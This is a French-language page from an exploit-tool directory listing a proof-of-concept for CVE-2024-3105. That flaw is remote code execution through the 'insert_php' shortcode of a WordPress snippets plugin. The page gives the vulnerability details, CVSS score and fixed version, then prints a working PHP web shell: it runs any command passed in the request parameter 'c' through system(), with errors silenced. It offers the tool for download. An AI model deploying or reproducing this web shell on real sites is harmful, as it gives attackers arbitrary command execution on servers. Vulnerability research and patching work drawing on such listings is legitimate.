Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-3105-PoC — Un PoC Exploit pour CVE-2024-3105 - Le plugin Woody code snippets – Insert Header Footer Code, AdSense Ads pour WordPress - Exécution de code à distance (RCE) | Kitploit
Outils/GitHubGitHub/hunthubspace/cve-2024-3105-poc
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubhunthubspace/cve-2024-3105-poc

CVE-2024-3105-PoC

Un PoC Exploit pour CVE-2024-3105 - Le plugin Woody code snippets – Insert Header Footer Code, AdSense Ads pour WordPress - Exécution de code à distance (RCE)

Voir le dépôt
213il y a 2 ansPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-3105 (PoC)

Le plugin WordPress Woody code snippets – Insert Header Footer Code, AdSense Ads est vulnérable à l'exécution de code à distance dans toutes les versions jusqu'à la 2.5.0 incluse, via le shortcode 'insert_php'. Cela est dû au fait que le plugin ne restreint pas l'utilisation de cette fonctionnalité aux utilisateurs hautement autorisés. Cela permet à des attaquants authentifiés, ayant un accès de niveau contributeur et plus, d'exécuter du code sur le serveur.

Informations

Score de base : 9.9 CRITIQUE
Vecteur : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Type de logiciel : Plugin
Slug du logiciel : insert-php
Correction : Mettre à jour vers la version 2.5.1, ou une version corrigée plus récente
Version affectée : <= 2.5.0

Exemple de code PHP

root@kitploit:~
<?php
    error_reporting(0);
    $cmd = "$_REQUEST[c]";
    if ($cmd == "") {
	    $cmd = "echo > NUL";
    }
    @system("$cmd");
?>
Télécharger l’outil